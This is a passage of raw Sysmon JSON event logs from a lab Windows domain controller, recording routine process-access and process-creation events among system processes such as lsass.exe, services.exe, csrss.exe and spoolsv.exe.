dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1159,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:44.563\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nSourceProcessId: 1144\r\nSourceThreadId: 2940\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {00000000-0000-0000-0000-000000000000}\r\nTargetProcessId: 2684\r\nTargetImage: C:\\Windows\\system32\\wermgr.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\wer.dll+6dc28|C:\\Windows\\System32\\wer.dll+370d0|C:\\Windows\\System32\\wer.dll+383dc|C:\\Windows\\System32\\wer.dll+13954|C:\\Windows\\System32\\wer.dll+51b6|c:\\windows\\system32\\wuaueng.dll+d4ca8|c:\\windows\\system32\\wuaueng.dll+554a8|c:\\windows\\system32\\wuaueng.dll+4e24b|c:\\windows\\system32\\wuaueng.dll+4e49b|c:\\windows\\system32\\wuaueng.dll+4e5fe|c:\\windows\\system32\\wuaueng.dll+4fb28|c:\\windows\\system32\\wuaueng.dll+5c36f|c:\\windows\\system32\\wuaueng.dll+4d1d5|c:\\windows\\system32\\wuaueng.dll+4c805|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:44.563","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","SourceProcessId":"1144","SourceThreadId":"2940","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{00000000-0000-0000-0000-000000000000}","TargetProcessId":"2684","TargetImage":"C:\\Windows\\system32\\wermgr.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\wer.dll+6dc28|C:\\Windows\\System32\\wer.dll+370d0|C:\\Windows\\System32\\wer.dll+383dc|C:\\Windows\\System32\\wer.dll+13954|C:\\Windows\\System32\\wer.dll+51b6|c:\\windows\\system32\\wuaueng.dll+d4ca8|c:\\windows\\system32\\wuaueng.dll+554a8|c:\\windows\\system32\\wuaueng.dll+4e24b|c:\\windows\\system32\\wuaueng.dll+4e49b|c:\\windows\\system32\\wuaueng.dll+4e5fe|c:\\windows\\system32\\wuaueng.dll+4fb28|c:\\windows\\system32\\wuaueng.dll+5c36f|c:\\windows\\system32\\wuaueng.dll+4d1d5|c:\\windows\\system32\\wuaueng.dll+4c805|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1160,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:44.563\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {00000000-0000-0000-0000-000000000000}\r\nTargetProcessId: 2684\r\nTargetImage: C:\\Windows\\system32\\wermgr.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:44.563","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{00000000-0000-0000-0000-000000000000}","TargetProcessId":"2684","TargetImage":"C:\\Windows\\system32\\wermgr.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1161,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:45.787\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B3-5F25-0000-001020530000}\r\nTargetProcessId: 856\r\nTargetImage: C:\\Windows\\system32\\services.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:45.787","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B3-5F25-0000-001020530000}","TargetProcessId":"856","TargetImage":"C:\\Windows\\system32\\services.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1162,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:45.787\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:45.787","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1163,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:45.787\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:45.787","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1164,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:45.787\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B3-5F25-0000-001020530000}\r\nTargetProcessId: 856\r\nTargetImage: C:\\Windows\\system32\\services.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:45.787","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B3-5F25-0000-001020530000}","TargetProcessId":"856","TargetImage":"C:\\Windows\\system32\\services.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1165,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:45.792\r\nProcessGuid: {A837DB8D-01C5-5F25-0000-001076B50200}\r\nProcessId: 2440\r\nImage: C:\\Windows\\System32\\spoolsv.exe\r\nFileVersion: 10.0.14393.3808 (rs1_release.200707-2105)\r\nDescription: Spooler SubSystem App\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: spoolsv.exe\r\nCommandLine: C:\\Windows\\System32\\spoolsv.exe\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=0105816460F59AAC077848616872DD7C,SHA256=37297B9EED859DBA103252CD3CFDBD88DC752C96D001A3C0E5FBF9F11D2ABAFF,IMPHASH=5788588905781015CF350C5A9ABBA1F2\r\nParentProcessGuid: {A837DB8D-01B3-5F25-0000-001020530000}\r\nParentProcessId: 856\r\nParentImage: C:\\Windows\\System32\\services.exe\r\nParentCommandLine: C:\\Windows\\system32\\services.exe","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:46:45.792","ProcessGuid":"{A837DB8D-01C5-5F25-0000-001076B50200}","Image":"C:\\Windows\\System32\\spoolsv.exe","FileVersion":"10.0.14393.3808 (rs1_release.200707-2105)","Description":"Spooler SubSystem App","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"spoolsv.exe","CommandLine":"C:\\Windows\\System32\\spoolsv.exe","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=0105816460F59AAC077848616872DD7C,SHA256=37297B9EED859DBA103252CD3CFDBD88DC752C96D001A3C0E5FBF9F11D2ABAFF,IMPHASH=5788588905781015CF350C5A9ABBA1F2","ParentProcessGuid":"{A837DB8D-01B3-5F25-0000-001020530000}","ParentProcessId":"856","ParentImage":"C:\\Windows\\System32\\services.exe","ParentCommandLine":"C:\\Windows\\system32\\services.exe","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1166,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:45.805\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001020530000}\r\nSourceProcessId: 856\r\nSourceThreadId: 1184\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-001076B50200}\r\nTargetProcessId: 2440\r\nTargetImage: C:\\Windows\\System32\\spoolsv.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|C:\\Windows\\system32\\services.exe+12939|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+5154|C:\\Windows\\system32\\services.exe+d7ae|C:\\Windows\\system32\\services.exe+20a11|C:\\Windows\\SYSTEM32\\ntdll.dll+2b9ae|C:\\Windows\\SYSTEM32\\ntdll.dll+29bc4|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:45.805","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001020530000}","SourceProcessId":"856","SourceThreadId":"1184","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-001076B50200}","TargetProcessId":"2440","TargetImage":"C:\\Windows\\System32\\spoolsv.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|C:\\Windows\\system32\\services.exe+12939|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+5154|C:\\Windows\\system32\\services.exe+d7ae|C:\\Windows\\system32\\services.exe+20a11|C:\\Windows\\SYSTEM32\\ntdll.dll+2b9ae|C:\\Windows\\SYSTEM32\\ntdll.dll+29bc4|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1167,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:45.805\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-001076B50200}\r\nTargetProcessId: 2440\r\nTargetImage: C:\\Windows\\System32\\spoolsv.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:45.805","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-001076B50200}","TargetProcessId":"2440","TargetImage":"C:\\Windows\\System32\\spoolsv.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
